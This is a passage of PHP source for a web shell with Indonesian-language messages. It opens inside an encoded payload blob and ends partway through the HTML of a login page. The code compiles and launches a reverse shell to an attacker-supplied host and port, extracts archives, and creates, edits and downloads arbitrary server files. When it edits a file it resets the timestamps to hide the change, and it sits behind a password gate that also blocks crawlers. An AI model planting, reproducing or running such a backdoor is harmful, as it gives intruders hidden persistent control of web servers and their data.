"cjNpNGg0NTRrNG80YjRtNWMyMDNqNHo1NTRxNWY0czI5NDczNjN0MXMzZjRqNDc0dDVyNGM0ZTRuMzIzajRyNDA2MTRrNHM1NTRyNWE0MDYyNGg0NTNyMXUxZTJnNHY1NzRjNGw0ajU2NHAzMDNrNDY0cDRxNWw0bTVxNHMyZDR2NXMyZzRiMzQzbzE5NGc0MTZtM2U0ZTViNHU1bDJwNXU1dDRiMjM0cTRhNGE0MTRjMjM0ODRnNWo0cDNpMjc0ajRjNDM2MjRlNW4yZDJ2NDYzczFnMmgybjNhMjk0ZzQxNm0zNzRoNTEzNTNyMW8zbzNoMmIybDRzNGw0czRrNW80ODJqNHU1NDRzNTE0YTQ1NG40ZzVnNHY1ZTJvNGQ0djU1M3gxdjFuM2EyODJhMmw1ZjU2NHE1aDR1NWwyNTQwNHgyazIxM3gxcDFmMnAzYzI4Mmo0bzVmNDM0ajRmNGY0NDRuNTg0dTVmNGg0dDRwMzczZzJlM3A0MTRkM2szcTQyNTAzMjNvMW8zZDJvM28zczRjNGc0dTJtNGc0djUzNGc0ZjR4NWw0cDMxM2UyOTRwNHc1bDQwNm0yNjRvNHc1ZjRvMmE0eDU5NG00eDM3NGI1aTJ1MzEzNTNyMW8zbzNoMmIybDRoNGg0dDIwNmQ0ZTR6M2c1NTRsNWk0czJrNDQ0aTViNGw1bzRkMjUzcDNmNG00ZTR6NTE0MTQ2NGw1dzVoMmU1azRuNXI0YjU1NDY0azIxM3gxcDFmMnAzYzI4MjY0ajU5Mmk0ODJwNGc0ODRzNWM0MTZtMmEzZTNnNWozcTNpMzM1bTI4MnAzMDVsNGczYzVwMzQ1cjNwNGw0cTNuMmEybDNuM3IzMzVuM28zajNlNXAzbzRrM24yOTI0MzYzdDFwM2UyZDJjMnE1YzRnMnAydjM1NGY0ZzR2NWo1NDR4NWkybTU5NDA0bzNwMm00bTRxNG80YTQxNmMyajRmNGk1YzRpNTQ0YTRqNGQyejNvMnAzazJvNGQ0djVxMmcyczRvNXM0NTRoNG41dTNrNHg1azQxNjg0MDZvM3M0aTQ1NGo0NDRiNGw1bTRoMmgydzMxMzU0aDJlMnM0dTEzM2YycDNlMmQyYzJwM2UyZzJwNGs1azRpNGg0ejV1M2IyazRoNHU1ajRsNWo1dDRiMjg0OTRjNGo0cjNsMnoycDExMzkycDM4MmUyOTJkMnAzZjJ6NWI0cDRwNHo1azRnMngyZTRyMW0xYTJwM20zOTI2NnIxMjNkMm8zbzNoMjc0bjRvNHQybjJuNTg0azI4MjM0aTJnNHAxczE5MmQycDNmMmw1cjRsNHUyeDNjNGM0dDJuM3IyaDIxMzYzMDM5MmwzYTJvMzk0MTZ3NXoyajI4NGM0bjJmMjc0bDJ6MnAxMTM5MnAzODJlMms0dTQwNnI0bTVqNGwyZTI0NDg0aDRuNDI0bDQ4NGEyMjRuNWIydTMxMzUzcjFvM28zaDJiMjU0azRpNHE0bTVrMjY0NDR3MzAzNjNtMXo0")); if($cf){ if(which('gcc')){ $out = cmd("".generate("decode", "n5c464a2t2i4f244o4d4g42434k582t2l4i4x5u2j594r274")."", $tmpdir); @unlink($bcfile); $out = cmd("{$bcfile} {$_POST['bhost']} {$_POST['bport']} &", $tmpdir); $outs = cmd("".generate("decode", "w5s4b234t4r4f296c274i4k5h4p32494")."", $tmpdir)['stdout']; } else { $outs = 'reverse shell using C: failed!'; } } else { $outs = 'reverse shell using C: failed!'; } } else { $outs = 'temp directory is not writeable!'; } } else { $outs = 'method gak tersedia!'; } } else { $outs = 'gak bisa di konekin!'; } echo $outs; die(); } else if($_GET['act'] == 'unzip'){ if(class_exists('ZipArchive')){ $zip = new ZipArchive(); $df = $_POST['xpath'] .'/'. $_POST['xname']; if($zip->open($df)) { $zip->extractTo($_POST['xpath']); $outss = $_POST['xname'].' extracted!'; $zip->close(); } else { $outss = $_POST['xname'].' gagal di unzip!'; } } else { $outss = 'module ZipArchive tidak terinstall!'; } echo $outss; die(); } else if($_GET['act'] == 'path'){ $_SESSION['path'] = isset($_GET['dir']) && !empty($_GET['dir']) ? $_GET['dir'] : $_SESSION['path']; if(isset($_GET['opt'], $_GET['entry'])){ $df = $_SESSION['path'] .'/'. $_GET['entry']; if($_GET['opt'] == 'newfile'){ $xdata = isset($_POST['xdata']) ? base64_decode($_POST['xdata']) : ''; if(AvFunc(array('fopen','fwrite','fclose'))){ $fp = @fopen($df, 'w'); if($fp){ @fwrite($fp, $xdata); @fclose($fp); $dout = "{$_GET['entry']} berhasil dibuat!"; } else { $dout = "{$_GET['entry']} gagal dibuat!"; } } else if(AvFunc(array('file_put_contents'))){ file_put_contents($df, $xdata); $outs = file_exists($df) ? "{$_GET['entry']} berhasil dibuat!" : "{$_GET['entry']} gagal dibuat!"; } else { $outs = "{$_GET['entry']} gagal dibuat!"; } } else if($_GET['opt'] == 'edit'){ if(isset($_POST['xdata'])){ $_POST['xdata'] = base64_decode($_POST['xdata']); $time = @filemtime($df); if(AvFunc(array('fopen','fwrite','fclose'))){ $fp = @fopen($df, 'w'); if($fp){ @fwrite($fp, $_POST['xdata']); @fclose($fp); @touch($df, $time, $time); $dout = "{$_GET['entry']} berhasil di-edit!"; } else { $dout = "{$_GET['entry']} gagal di-edit!"; } } else if(AvFunc(array('file_put_contents'))){ file_put_contents($df, $_POST['xdata']); @touch($df, $time, $time); $dout = file_exists($df) ? "{$_GET['entry']} berhasil di-edit!" : "{$_GET['entry']} gagal di-edit!"; } else { $dout = "{$_GET['entry']} tidak dapat di-edit!"; } } else { if(!is_writable($df)){ $dout = "Disini gk bisa edit file/direktori!"; } else { $dout = ""; if(AvFunc(array('fopen','fread','fclose'))){ $fp = @fopen($df, 'r'); if($fp){ while(!@feof($fp)){$dout .= htmlspecialchars(@fread($fp, @filesize($df)));} @fclose($fp); } } else{ $dout = "Gagal edit {$_GET['entry']}!"; } } } } else if($_GET['opt'] == 'download'){ if(isset($_GET['dir'], $_GET['entry'])){ $df = $_GET['dir'] .'/'. $_GET['entry']; if(@is_file($df) && @is_readable($df)){ header('Pragma: public'); header('Expires: 0'); header('Cache-Control: must-revalidate, post-check=0, pre-check=0'); header('Content-Type: application/force-download'); header('Content-Type: application/download'); header('Content-Type: '.(function_exists('mime_content_type') ? @mime_content_type($df) : 'application/octet-stream')); header('Content-Description: File Transfer'); header('Content-Disposition: attachment; filename='.basename($df)); header('Content-Length: '.@filesize($df)); header('Content-Transfer-Encoding: binary'); $fp = @fopen($df, 'r'); if($fp){ while(!@feof($fp)) echo @fread($fp, @filesize($df)); fclose($fp); } exit(); } else { echo "File tidak dapat di download!'"; exit(); } } else { echo "Tidak ada file yang dipilih!"; exit(); } } else { $dout = ''; if(@filesize($df)>0){ if(AvFunc(array('fopen','fread','fclose'))){ $fp = @fopen($df, 'r'); if($fp){ while(!@feof($fp)){$dout .= htmlspecialchars(@fread($fp, @filesize($df)));} @fclose($fp); } } else if(AvFunc(array('file_get_contents'))){ $dout .= @file_get_contents($df); } else { $dout .= "{$_GET['entry']} ini gak bisa dibaca!"; } } else { if(AvFunc(array('file_get_contents'))){ $dout .= @file_get_contents($df); } } } echo $dout; } else { echo base64_encode(filemanager($_SESSION['path'])); } die(); } else if($_GET['act'] == 'logout'){ unset($_SESSION['auth'], $_SESSION['path']); header('location: '.$_SERVER['PHP_SELF']); exit(); } } if(isset($_POST['xpass'])){ if(password_verify($_POST['xpass'], $auth_pass)){ $_SESSION['auth'] = $auth_pass; $_SESSION['path'] = $lokasiberkas; header('location: '.$_SERVER['PHP_SELF']); exit(); } else { $statusLogin[] = 'wrong password :('; } } if(!isset($_SESSION['auth'])){ blockCrawler(); echo " Restricted area
Auth
".(isset($statusLogin) ? "
{$statusLogin[0]}" : "")."
"; die(); } else { blockCrawler(); ?> <?php echo $stitle;?>